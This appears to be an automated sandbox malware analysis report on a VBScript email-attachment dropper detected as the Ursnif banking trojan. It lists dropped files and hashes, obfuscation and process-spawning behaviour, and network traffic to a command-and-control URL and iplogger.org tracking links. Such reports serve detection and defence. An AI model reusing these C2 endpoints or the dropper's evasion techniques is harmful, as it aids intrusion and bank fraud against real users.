Analysis Report view_attach_72559.vbs

ID:	331433
Product:	CloudBasic
Start time:	20:40:06
Start date:	16.12.2020
Sample:	view_attach_72559.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	29933320f02dfc13999ff70cd960a291
SHA1:	29db771aef8cfe3231e5f1b077bf49c096777043
SHA256:	7c4f0d072bdbf9aaba20f96173a9274376d589a171ff96d4bfbb56427ea17f7c

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFFA037E-3FD6-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	F79622EE63525B4F8608F84868DFE64C	881B8FE73BA7134429292FA913F9AE6C599E661E	87E71F2719C309D4F31E840EB912AB6BAC45500CBC7633BBCD9321E4E8B8FBA6
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CFFA0380-3FD6-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	75AD93FDE8741ABE37803C57C7239F62	015E864C55F8E1152F6F6EE987453DB7F2554EA5	4D891ECADF4E21298FA5B588920BC7A6847CCD39BFA282EDD0EAEDCFA575CB10
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	F118AEC2673FB7058A3CC8DA0D7D4AA7	5555C3A98FB3C085E2F34E47F861BF1DF6D9D790	4C1E33AF19507D8A14145A71D2DF742FEB871A259E6B95911E6C80931DDDA273
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	A752957DBDCE7BC9B7212DE222FC0A63	5F7D2280928F83FD777CA377001DE777213D21CA	6B23E294E42DD7416B8C9A5720006E5820DE129214584F637CEB87F3B61A59E3
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	4A00FF0525AA01F76F9A730DDABEED97	83EF255D7777444EC9BE0AF8058BCC9B0FDC1CE5	6FA38B6513CE17F990E9A559A3C167A1C562E372F01EA7A194237A7029283002
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	0C0B09F48D0F73E503AFD4DCB83E3675	CD36BFAD97E933468642BE459C5B3E5C41A58F61	233D3AA7A29EDABA7FDFBB0DC9EDAA5AFBABC7F00C154E092B62A6BDB1C7A10C
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	C9796C6A36471AFF211A16538759B55E	8FD013141E6276108ADD3571F4FE9FD2EA2849DB	9F085CEA786625280255FDDDD337C7364451C1A7FFD79CECA4BC89B69FF2B213
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	3F7384E58009F1CF89B9912978C4983B	9E7F7226713E5B62E76BDFAFEBC811538E799A2D	7A32144D9ACC7F1722A8DA578F8CE3293E19D223732DDAECCFF4B9F62A21F54C
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	421D29A8C883F69BB5754DF7CE4F96AD	C5E13B11AD57F7037B2AEA0B1A58EED219FFB0D3	A566F16A6C77A2882B4A46813BF591A5C4ED68335D19DAC22BA61253639E45CB
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	E0566B8AF457CE4DD71186D64FBCCA92	3A94CF67B68C80868D31365FA2E3A1B7ED25ED44	5C86257A4B2C437BE193C2C479ABE6096A553AE84988F988BE670D740845A660
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	7BD67AD55FF3C4101DA0C7F72E2FBCDE	C279B261784109300D57FD101AC3C9F3DFB872A9	6F1F7BC1DB754F350765508AD40473224F9AE50909233D9F8625E78EC71AD43B
C:\Users\user\AppData\Local\Temp\Chester.ape	ASCII text, with no line terminators	D48899079DE705741C3E83077284BC4D	DE88E6F59311959EE0DEEFA999D98A0A09D5748D	DC4916A8C803ADE7FD3DC750B3E6252BB1AD688821A613A2B74F6FB89C7130F0
C:\Users\user\AppData\Local\Temp\Cicero.rm	ASCII text, with no line terminators	3C94E13E6629EF203D6CD694C0821837	A346BB508F82B411C01759C7E71862C7C1B0E170	7B20234A44EFFF257AD0F356B0C4E9006BEB8A78C8DDA36257DBD3815A70E442
C:\Users\user\AppData\Local\Temp\Dorchester.asf	ASCII text, with no line terminators	87FAC5EFC1BD7DFD5C26E19B0807902C	289768A56820126CDD4AAFF5562F08ADCA08238D	D18D532187E5C9196D1C91A36280717C3DCBFF8BA550C543FCAD770148725874
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	4A9ED9208CA05A8386F95FC9F422CCA4	D1B65C43289A8F80F66F04443D1ABEA023A229B8	A62D21121F55F9CB9FEB8336312813787C664B5436A74B57DBBBC520281CBE06
C:\Users\user\AppData\Local\Temp\Macon.gif	ASCII text, with no line terminators	47B6C296517745D4F1BA7D0E75249DE7	EEB0E2F74752AE1D88645D8A3B56EFE14DB2CD46	6F96AE646DCC5F8A930FAE413CD9F6F3D59E048DBDD8664C8CBCB73B05ADDC2D
C:\Users\user\AppData\Local\Temp\Martian.apk	ASCII text, with no line terminators	74F94C761841D291E484C7A1B5D09DCB	61135B95844BEBB3D2B0447A26CFBCB712B94C20	39916BAF4F30926112C13F34B50D7B0BA74F6AFF36120A21271C1F7F3BAAE183
C:\Users\user\AppData\Local\Temp\Oxnard.rb	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C320A187099D091B08E3E6F6CCD13951	C97C1B6F0815A1040203F2439A54E80809CF094C	04ECC922E98B64E4B13C966B9705D5E4B7BD4E789F27FD3C4B873D97C7E6722D
C:\Users\user\AppData\Local\Temp\Schneider.mp2	ASCII text, with no line terminators	4EF348200316D38EE63509A576AC5178	5D4867714E6B2289523FE7A0DD3562E95FA26AD6	4A888A767FAEA5B08AFFA8F1021B6A1FEB7AE25936CF41B1518DAD22FDA6A607
C:\Users\user\AppData\Local\Temp\adobe.url	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators	99D9EE4F5137B94435D9BF49726E3D7B	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
C:\Users\user\AppData\Local\Temp\arisen.mp2	ASCII text, with no line terminators	8EC33937ABA9AEFCBE9A2370714CC7D8	727B5AA9782CD506D96AC4E2FDD8F059DE779A37	77416C24DDCF896D44CE78F68A979F0CD032B1CB2A1EC61465FC908CB724DD58
C:\Users\user\AppData\Local\Temp\barbarous.otf	ASCII text, with no line terminators	BA060A184D10E715F484591DC34CFB98	344469DAE1D650793D63F75A1A3EB7EFE648046B	E92BFC6E289B368A641A2CA39BEF7BB3A76C03E4C4EEE8FC24CDC5C0B88E9177
C:\Users\user\AppData\Local\Temp\bard.msi	ASCII text, with no line terminators	DED2859B328A8261C90815003AB419C5	6BB23F7CB3F0B0D93BB4C4D720699E227D0FCABC	D1667387C73330BB64AF8EC36BC0896ABCC7CDA47ACFEB5389AD026F074F16AC
C:\Users\user\AppData\Local\Temp\bitt.rmvb	ASCII text, with no line terminators	2638D21CE62C0B7738B093F75D7AD079	582B8F3607046B4FE39B141BBAA792DFA232E56B	0BAABBC641A84FB5ECFEF898C1DB1EF93B480CCFBFAFBFEBA3D33B1B89BDECFC
C:\Users\user\AppData\Local\Temp\cloak.mp2	ASCII text, with no line terminators	18F6CCBFA502608CAA267F266D33E12B	03A91161E0BFC5031CD547AABE1399E5AF65FB38	D8FD4BBF9119DE441078766C75FEAADC9055881A7F597D3F16EB6C467CB72970
C:\Users\user\AppData\Local\Temp\curium.m4	ASCII text, with no line terminators	77BC018BF1A2D16E03105FC2BF050C0A	6D2A38E3B4D987F850D009BE6D6A057A7E3FCC9C	E63CBF675CAD78DC1220AE6566804B4FDDE700E9BAE8732DAF495CA9B4D981F0
C:\Users\user\AppData\Local\Temp\delicacy.ra	ASCII text, with no line terminators	F8B64D575FCE190560D975E2A0F0CE76	73C8FF470D77285E121B8B5A860E759CBF2DA6A3	3F1B695E2E104E384AA86E347B7EDE93251312B1F405952CD0FD79746CA80FEE
C:\Users\user\AppData\Local\Temp\diopter.java	ASCII text, with no line terminators	45573CE53218D6EA19C7CC41245FE267	231B7D38516BA11A3E5559B2FAFE95F91411BCAE	8B634FD184C64F75BB77DAFECA97F82D6AD7850A34D42976A16CCA149CFEB43A
C:\Users\user\AppData\Local\Temp\doorman.xcodeproj	ASCII text, with no line terminators	05EB58AA3CCBA32BC83E45AE10ACAFBE	F8EDE4F30B392A5EF706664A13AD15CE99D93B07	513D9B46FFF583E0A64745ACEE6042D4022F834C89400CE164DAEC98BA5C3D43
C:\Users\user\AppData\Local\Temp\elfin.msi	ASCII text, with no line terminators	AAD3DCA56C72421509F79865EA213C40	4FADB10E78DCEDC576860A79A29BBA752EBADA1A	97A9F32C0BE7C499EBEA5DD658AE26EC6D5E1AAFEA316FD7A88299A08A45179E
C:\Users\user\AppData\Local\Temp\failsoft.css	ASCII text, with no line terminators	87EB13C401656709E21D621F47B18557	70494FD665DEA237528B096CA1199D0BA6E8CF02	AFD0A828606FFA09B925CF31537B0E8BDB06A9BA69E2D0132DB778827C5E5E26
C:\Users\user\AppData\Local\Temp\fallout.tbz2	ASCII text, with no line terminators	5EAF6223A7ADE9F271332CA0F163BA08	D04304007AB79F32F02D12301BBBE0D2838CC800	E033621AD4E989DFE3E779187FC0C4B446654FE491C774282277D9493DC8A354
C:\Users\user\AppData\Local\Temp\guise.ar	ASCII text, with no line terminators	B795A4FAA2FDD3BB6435D4D61F706F0A	5B415EF7EE8CC39613C2A4ABE5AD59CF537EEBAB	5E1B7EF9DB3A6D7B379EAF37CDA2C0E0B5F18445DEF7F12D429DB21955A17274
C:\Users\user\AppData\Local\Temp\halvah.scss	ASCII text, with no line terminators	699EB6004A0A1AEAD73B1ED4A1B243DE	2BA320B96697217B225942979CAC7281449AA045	9172D32E6AE8183F23FB0956E38E6EE1BA51B4B04A2B2437B5B6160453B5BC71
C:\Users\user\AppData\Local\Temp\hitch.rst	ASCII text, with no line terminators	C149DE3F79DCD0BD05A1B94DB1C238F2	943CD6C632C0731F4A696CB654470E1CD3496473	70C0F8A99E5E744CA3418D8D0C15CD8A6ED59ECE69C073243456EE32A658B47C
C:\Users\user\AppData\Local\Temp\hour834.flv	ASCII text, with no line terminators	DC09826292EC48B0CBD504D2BE3B8167	83B1443E3F88C85DD2BD789D36BAB2A1C8679FA7	F164F9BB2D9FABB549AAB68819C3255F34BEAB75E0DDFA618B059EE0C6C65369
C:\Users\user\AppData\Local\Temp\legion.dxf	ASCII text, with no line terminators	DD24671D9404E9C36CA2D0728F0CF615	3B73D1D1287704B1C8D7A97E7999E57B3E4C65E6	611ABFA58D9883BE637F93A6FD23A252721AEF5AB5D5581BA43C0A7061455F5E
C:\Users\user\AppData\Local\Temp\manufacture.jpeg	ASCII text, with no line terminators	1B763728C91574A0122FB0A343902049	F2E5A437F933663D0FD76E835E6686C5978EB9C7	CA9ED7892C09527B07317AB1499A4AC047FCDE0851CCA110D062CABA044EA331
C:\Users\user\AppData\Local\Temp\nowhere.avchd	ASCII text, with no line terminators	F8BC2F62C3C91AE51ECFAF2F7A2FCF5E	C4279B768DA0B257C09A9D264DC4EAF409533E32	7FF369BFE78742ED731BA80D19F48EB6F2DD050DA4B4A92E3131F911E87B9AD7
C:\Users\user\AppData\Local\Temp\preferential.qt	ASCII text, with no line terminators	18140628248CBBD9016D35781288BB87	9C139E62099A1D6A2E1CF055930DA0CE61904013	6A839A398ADBB2CE4C8EBC06BBB83157099C24EBC03D2A0EE4119B1C6993E86F
C:\Users\user\AppData\Local\Temp\prestige.zip	Zip archive data, at least v2.0 to extract	056CFF5AB72065AD83271A7CC577DB20	A999541AF64F34CB8A11206224497110176331CE	E660AE12199521288D039C5594A8FF803D0C82B005223CAC05ABA12F43B24729
C:\Users\user\AppData\Local\Temp\programmed.3gp	ASCII text, with no line terminators	470239F8744F989F7DC05CE1A6B673ED	BC2C4C5FA8812618386E2398C61068BEA1FEDD70	E484636BDC32A9983DE6655BFF77C085C946AB651E14A6D8C129BCA120129AC2
C:\Users\user\AppData\Local\Temp\rectifier.xcodeproj	ASCII text, with no line terminators	942E89877F6401D47FA2915AA8FD7EAD	30598B643B438725CEA08E125AEA38A9B15B70C4	052832F9CA187A3786EC79BD5EE1C3AA5DF067BC1599F0ED31769E63AB239481
C:\Users\user\AppData\Local\Temp\rustic.tbz2	ASCII text, with no line terminators	C97A0A530A9912484E17E4E1AB6B601E	3338E31D8547A4B4F59B694BBB4B78374F6E3348	3071FBFCE721232FF91C7148854533A0F45AEF024A204C1612BCA4CD6BA00CF8
C:\Users\user\AppData\Local\Temp\shimmy.py	ASCII text, with no line terminators	ED0EEA1BCBCBFDD03A904212D7F8D114	7DB8BE121D194FF99A641664C8C93466FD65CCCC	40CA1795953988C8A19F5492136018BBC3594B23C71782165095E4AD310BDD9F
C:\Users\user\AppData\Local\Temp\signify.tif	ASCII text, with no line terminators	FEEF16A74C73940EFB42E59907B9EA65	39D209EF251A38F09D8B57FD5A456880546F32FB	40EB90E5A53FA84209B10D596D4DC390A6D1372B1CCF83D2F241521108D7CC56
C:\Users\user\AppData\Local\Temp\switchblade.exe	ASCII text, with no line terminators	1B9DEAFFEAB94DC6200DC5F8E979FB65	0A805113E7015386199996FA5791BDAE0669A444	BD1B8E317206E55D54175BDAC393D1DA4883216095F70012B9F4F88A09A13B92
C:\Users\user\AppData\Local\Temp\taro.mov	ASCII text, with no line terminators	D12760FD1671E768A2B2D38C58C06F90	F401A0DA110A554C911D1016E25C530D69A735C2	7ED4EC3376B7EBA348C1D5295F4A115444B3DCC14E1C5380FEF16B4AA503A2D9
C:\Users\user\AppData\Local\Temp\triode.sh	ASCII text, with no line terminators	E9D578EB7D721DD650F08EF8FA196FF9	D3B988DF1A625F3CDB1DC1B9D232B335BA42D1AB	238AD1BB3A413AAF0BCA367BF41FCE2AE056A40C50876A5B99A36BB6A21B9027
C:\Users\user\AppData\Local\Temp\wildfire.md	ASCII text, with no line terminators	7750CEE87A9AF0A3CC291199AD65D278	2580B8ED57C97C6505CA3281A220CA3536BA3E94	19E318B5517FD99B458A48FCA73BF9FB4C6B332FC815F590FE9170A9BE3F9398
C:\Users\user\AppData\Local\Temp\~DF86F75BB46A075095.TMP	data	72571B70D43DBBF3F16DD8DF576A9A0C	F13021A674330CC7999888A9C512B7E0A84F352A	A294E8BDB9B485B0BD5BEB402645F162A7DE542938C72487634D26700384A0E1
C:\Users\user\AppData\Local\Temp\~DFCE3CEB3DA92FCDD0.TMP	data	C468E90E5C41BFDABF93EE54FE326E8C	C6699276B88E5C2DD5B9A95163C91080685BA9A8	BE53EF5B8B010D83AA6A8938B01F932C943EF96AF62913AC59637BFFFFD0D835

Spreading:

Enumerates the file system

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox View	IP Address: 88.99.66.31 88.99.66.31

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBkab56Bm_2/FWmqnzUOX9_2B0/YbRWfB6IMq7TSr21K5FNM/xWmFuq_2FeEONGMO/1ZuPh_2FNFAeM3T/FM11WlspOeJ_2FqYpl/U_2F6jwXu/YXiyreYoS1UAkST_2FVa/JT_2Fx9W7QvoG6HJsdC/ExFIoNdpiPpyKG7cmJGp40/huNnlqBJ9uVVH/QyyRFE1b/30os8htaDb_2FAitT_2BOsm/SKMxwp3_0A/_0DyvsrFrDpoMB3eg/_2BPhnWhGFuU/FPA93GCv8Zd/FBoszW1uVg1_2B/gtKiRyRf4RAjLF4_2F0P1/_2FR HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive

Found strings which match to known social media urls

Source: msapplication.xml0.17.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.17.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.17.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.17.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.17.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.17.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: iplogger.org

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 16 Dec 2020 19:42:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Urls found in memory or binary data

Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp	String found in binary or memory: http://crl.com
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp	String found in binary or memory: http://crl.com9
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: {CFFA0380-3FD6-11EB-90EB-ECF4BBEA1588}.dat.17.dr, ~DFCE3CEB3DA92FCDD0.TMP.17.dr	String found in binary or memory: http://golang.feel500.at/api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBka
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: msapplication.xml.17.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.17.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.17.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.17.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.17.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.17.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.17.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.17.dr	String found in binary or memory: http://www.youtube.com/
Source: wscript.exe, 00000000.00000003.711863605.000001C8B6372000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712532222.000001C8B5BEB000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712769407.000001C8B4CF0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/18j267
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/18j267Nums
Source: wscript.exe, 00000000.00000003.712665350.000001C8B3A16000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1D5y47
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Java / VBScript file with very long strings (likely obfuscated code)

Source: view_attach_72559.vbs

Initial sample: Strings found which are bigger than 50

Classification label

Source: classification engine

Classification label: mal84.troj.evad.winVBS@4/52@2/2

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFFA037E-3FD6-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Creates temporary files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Executes visual basic scripts

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs'

Queries process information (via WMI, Win32_Process)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Reads ini files

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Submission file is bigger than most known malware samples

Source: view_attach_72559.vbs

Static file information: File size 1478801 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Binary contains paths to debug symbols

Source:

Binary string: c:\valueState\Redparagraph\unitList\Hislay\weight.pdb source: Oxnard.rb.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

